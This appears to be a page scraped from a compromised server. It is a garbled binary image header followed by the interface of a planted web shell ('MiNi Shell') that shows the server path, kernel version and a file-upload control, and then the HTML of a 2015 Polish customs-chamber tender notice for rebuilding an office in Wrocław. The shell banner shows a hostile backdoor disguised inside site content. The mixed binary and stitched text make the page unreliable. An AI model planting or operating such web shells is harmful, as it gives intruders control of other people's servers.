JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150706/167060-N-2015.html

<p class="kh_header"><b>Wrocław: Przebudowa budynku administracyjno-biurowego dla potrzeb Urzędu Celnego we Wrocławiu przy ul. Cichociemnych 11</b><br>
<b>Numer ogłoszenia: 167060 - 2015; data zamieszczenia: 06.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna we Wrocławiu , ul. Hercena 11, 50-950 Wrocław, woj. dolnośląskie, tel. 71 3705328, faks 71 3435439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wroclaw.scelna.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku administracyjno-biurowego dla potrzeb Urzędu Celnego we Wrocławiu przy ul. Cichociemnych 11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie zadania inwestycyjnego w zakresie robót budowlanych, instalacyjnych, technologicznych i drogowych dotyczących - Przebudowy budynku administracyjno-biurowego dla potrzeb Urzędu Celnego we Wrocławiu przy ul. Cichociemnych 11:
1.1.Zakres robót do wykonania przy przebudowie budynku administracyjno-biurowego dla potrzeb Urzędu Celnego we Wrocławiu przy ul. Cichociemnych 11 obejmuje między innymi:
1)Zagospodarowanie terenu i mała architektura.
1.1 Wycinki drzew i krzewów
1.2 Wykonanie terenów zielonych
1.3 Wykonanie ławek, stojaków na rowery i innych
1.4 Wykonanie ogrodzenia
2)Roboty budowlane w budynku
2.1 Roboty przygotowawcze
2.2 Roboty rozbiórkowe
2.3 Ściany przyziemia, mury oporowe i izolacje
2.3.1 Wykonanie izolacji przeciwwilgociowej fundamentów
2.3.2 Przemurowanie murów oporowych, wyrzutni powietrza i schodów
2.3.3 Przemurowanie doświetli piwnic
2.3.4 Wykonanie iniekcji ścian przyziemia
2.4 Wzmocnienie konstrukcji ścian i stropów
2.4.1 Wzmocnienie konstrukcji ścian
2.4.2 Wzmocnienie konstrukcji stropów
2.5 Roboty murowe
2.6 Roboty tynkarskie i malarskie
2.7 Zabudowy G-K i ścianki systemowe
2.8 Wykonanie okładzin ścian
2.9 Wykonanie posadzek i okładzin poziomych
2.9.1 Wykonanie posadzki przemysłowej w piwnicy
2.9.2 Wykonanie posadzek w pomieszczeniach higieniczno-sanitarnych 
2.9.3 Ułożenie wykładzin dywanowych
2.9.4 Ułożenie wykładzin elastycznych
2.9.5 Wykonanie wycieraczki wewnętrznej
2.10 Stolarka i ślusarka - drzwiowa, okienna, ścianki i balustrady
2.10.1 Montaż ścianek aluminiowych
2.10.2 Montaż drzwi aluminiowych
2.10.3 Montaż drzwi stalowych
2.10.4 Montaż drzwi drewnopodobnych
2.10.5 Montaż samozamykaczy
2.10.6 Montaż Balustrad
2.11 Wykonanie termomodernizacji budynku
2.11.1 Docieplenie ścian przyziemia
2.11.2 Docieplenie ścian elewacyjnych za pomocą styropianu
2.11.3 Docieplenie ścian kolankowych
2.11.4 Docieplenie stropu nad II piętrem
2.11.5 Wymiana drzwi zewnętrznych
2.11.6 Wymiana stolarki okiennej
2.12 Roboty elewacyjne pozostałe
2.12.1 Zabezpieczenie stolarki folią, zabezpieczenie rusztowań
2.12.2 Tynkowanie kominów
2.12.3 Wymiana okładziny drewnianej z dociepleniem
2.12.4 Malowanie elewacji
2.12.5 Wykonanie podokienników z blachy
2.12.6 Remont gzymsu
2.12.7 Wykonanie daszku nad wejściem
2.13 Roboty dekarskie
2.14 Wykonanie opaski betonowej wokół budynku
2.15 Wykonanie podjazdu dla niepełnosprawnych
3)	Instalacje sanitarne
3.1 Roboty węzła cieplnego istniejącego
3.2 Wykonanie instalacji wentylacji grawitacyjnej
3.3 Wykonanie instalacji c.o. i ciepła technologicznego
3.4 Wykonanie instalacji wody zimnej, ciepłej, kan. sanitarnej i skroplin
3.5 Wykonanie wewnętrznej instalacji przeciwpożarowej
3.6 Wykonanie instalacji wentylacji mechanicznej
3.7 Wykonanie instalacji wentylacji klimatyzacji pomieszczeń biurowych
3.8 Demontaż starej instalacji c.o.
3.9 Demontaż starej instalacji wody zimnej
4)Instalacje elektryczne
4.1 Wykonanie zasilania obiektu
4.2 Instalacja agregatu i UPS
4.3 Wykonanie rozdzielnic
4.4 Wykonanie tras kablowych
4.5 Wykonanie WLZ
4.6 Wykonanie instalacji oświetlenia wewnętrznego
4.7 Wykonanie instalacji gniazd i siły
4.8 Wykonanie instalacji uziemień i odgromowej
4.9 Wykonanie instalacji zewnętrznych
4.10 Pomiary
5)	Instalacje teletechniczne
5.1 Wykonanie tras kablowych
5.2 Wykonanie sieci IT
5.3 Wykonanie instalacji CCTV
5.4 Wykonanie instalacji SSP
5.5 Wykonanie instalacji SSWiN
5.6 Wykonanie instalacji KD
5.7 Pomiary i uruchomienia
6)Roboty drogowe
6.1 Roboty przygotowawcze
6.2 Wykonanie podbudowy pod nawierzchnie
6.3 Wykonanie nawierzchnie
6.4 Wykonanie pozostałych elementów ulic tj. krawężniki etc. 
Zamawiający wymaga zastosowania materiałów i wyposażenia w pełni nowych tzn. nieregenerowanych, nie używanych wcześniej w całości ani w części, wyprodukowanych przez producenta danego typu wyrobu.
Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja projektowa, dokumentacja wykonawcza, specyfikacja techniczna wykonania i odbioru robót budowlanych oraz przedmiary robót zamieszczone wraz ze SIWZ  na stronie internetowej Izby Celnej we Wrocławiu- odrębne pliki Pdf  w ZIP.
Wykaz załączonej dokumentacji :
1.PROJEKT BUDOWLANY
2.DOKUMENTACJA PROJEKTOWA WYKONAWCZA -  BRANŻA: ARCHITEKTURA I KONSTRUKCJA
3.DOKUMENTACJA PROJEKTOWA WYKONAWCZA -  BRANŻA : INSTALACJE SANITARNE
4.DOKUMENTACJA PROJEKTOWA WYKONAWCZA -  BRANŻA: INSTALACJE ELEKTRYCZNE
5.DOKUMENTACJA PROJEKTOWA WYKONAWCZA -  BRANŻA: INSTALACJE TELETECHNICZNE
6.DOKUMENTACJA PROJEKTOWA WYKONAWCZA -  BRANŻA: DROGOWA
7.SPECYFIKACJE TECHNICZNE WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH DLA BRANŻ;
a) BUDOWLANEJ;
b) SANITARNEJ;
c) ELEKTRYCZNEJ;
d) TELETECHNICZNEJ;
e) DROGOWEJ;
f) ZAGOSPODAROWANIA TERENU.
8.BIOZ (INFORMACJA NT. PLANU BIOZ) - UJĘTO W OPISIE PROJEKTU BUDOWLANEGO 
9.CHARAKTERYSTYKA ENERGETYCZNA - UJĘTO W OPISIE PROJEKTU WYKONAWCZEGO BRANŻY ARCHITEKTONICZNEJ 
10.PRZEDMIAR -  BRANŻA BUDOWLANA - ARCHITEKTURA, KONSTRUKCJA
11.PRZEDMIAR -  BRANŻA DROGOWA 
12.PRZEDMIAR - INSTALACJE SANITARNE (KLIMATYZACJA, WENTYLACJA, WOD - KAN I C.O.)
13.PRZEDMIAR - INSTALACJE ELEKTROENERGETYCZNE
14. PRZEDMIAR - INSTALACJE NISKOPRĄDOWE + SYSTEM SYGNALIZACJI ALARMU POŻAROWEGO  (SAP) + DŹWIĘKOWY SYSTEM OSTRZEGAWCZY (DSO).

Zamawiający informuje, że w dniu 16.07.2015r. w godz. od godz. 10:00 do 14:00 na terenie obiektu Izby Celnej we Wrocławiu mieszczącego się we Wrocławiu przy ul. Cichociemnych 11 odbędzie się wizja lokalna.
Dla prawidłowego sporządzenia oferty oferent winien być obecny podczas wizji. W trakcie spotkania oferentów sporządzony zostanie protokół. W przypadku nieobecności Wykonawcy na wizji lokalnej, na pisemny wniosek zostanie przesłany protokół z wizji. 
Wykonawca przed wizją lokalną na obiekcie winien poinformować Zamawiającego, z uwagi na ograniczony dostęp do obiektu,  o uczestnictwie w wizji lokalnej - pisemnie, mailem na adres: ilgw@wro.mofnet.gov.pl lub telefonicznie na nr 71 3705 390 w dni powszednie w godz. 7:30-14:30..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.10.00-8, 45.12.00.00-4, 45.20.00.00-9, 45.21.31.50-9, 45.23.00.00-8, 45.26.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.32.00.00-6, 45.33.00.00-9, 45.33.10.00-6, 45.34.00.00-2, 45.40.00.00-1, 45.42.00.00-7, 45.43.00.00-0, 45.44.10.00-0, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości: 100.000,00zł (słownie: sto tysięcy  złotych 00/100).
Wadium może być wnoszone w następujących formach:
1.pieniądzu,
2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.gwarancjach bankowych,
4.gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
Wadium wnoszone w pieniądzu należy dokonać w formie przelewu na rachunek; 
NBP Oddział  Wrocław nr 12 1010 1674 0036 6513 9120 0000
 z adnotacją : wadium - na przebudowę budynku we Wrocławiu przy 
ul. Cichociemnych 11- nr sprawy: 450000-ILGW.271.22.2015
Jeżeli wadium będzie wnoszone w innej formie niż w pieniądzu, Wykonawca jest zobowiązany oryginał wadium umieścić osobno w kopercie, jako załącznik do opakowania, w którym składa się ofertę, natomiast kserokopię dokumentu poświadczonego za zgodność z oryginałem załączyć do oferty. Wadium musi być ważne przez okres co najmniej 30 dni licząc od upływu terminu składania ofert (okres związania ofertą).
Informacje dodatkowe:
1)Wadium musi być wniesione nie później niż przed upływem składania ofert. 
2)Wadium będzie zwrócone (lub zatrzymane) w terminie i na warunkach wskazanych w art. 46  ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej jednego zamówienia obejmującego roboty budowlane polegające na przebudowie budynku o powierzchni użytkowej nie mniejszej niż 1 500 m2 o wartości zamówienia - jednej umowy nie mniejszej niż 2.500.000,00 zł (brutto). Wartości podane, w dokumentach potwierdzających spełnienie warunku, w walutach obcych wykonawca przeliczy wg średniego kursu NBP na dzień podpisania końcowego protokołu odbioru robót.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w celu potwierdzenia, że spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia zobowiązany jest wykazać, że:
-dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej.
-dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
-dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych - bez ograniczeń lub w ograniczonym zakresie; bądź odpowiadające im uprawnienia w zakresie odpowiadającym przedmiotowi zamówienia;
-dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub w ograniczonym zakresie umożliwiającym wykonanie zamówienia;
Zamawiający dopuszcza połączenie ww. funkcji  pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla  poszczególnych funkcji; Zamawiający wymaga, żeby nadzór nad całością wykonania zamówienia i osobami uprawnionymi w pozostałych branżach sprawował kierownik budowy. Funkcję kierownika budowy może sprawować wyłącznie osoba posiadająca uprawnienia w specjalności konstrukcyjno-budowlanych. Osoba, która będzie pełniła funkcje kierownika budowy winna posiadać co  najmniej 5-letni staż pracy zawodowej w danej specjalności; 
Wyżej wskazane osoby  muszą wykazać się znajomością języka polskiego w stopniu umożliwiającym swobodne porozumiewanie się w mowie i piśmie (dopuszcza się zmianę tego warunku poprzez zatrudnienie przez wykonawcę na własny koszt tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie wszelkich spotkań z udziałem tych osób);
Uprawnienia o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) oraz Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz. 578 ze zm.) lub równoważne - nadane na podstawie wcześniej obowiązujących przepisów. W przypadku Wykonawców zagranicznych dopuszcza się również kwalifikacje, zdobyte w innych państwach, zgodnie z art. 12a ustawy Prawo Budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został przez Wykonawcę spełniony, jeżeli posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, iż jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 6.000.000,00 (słownie: sześć milionów złotych).
Wykonawca powołujący się przy wykazywaniu spełnienia warunku udziału w postępowaniu, na zasoby innych podmiotów przedkłada opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 6.000.000,00 (słownie: sześć milionów złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby łub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

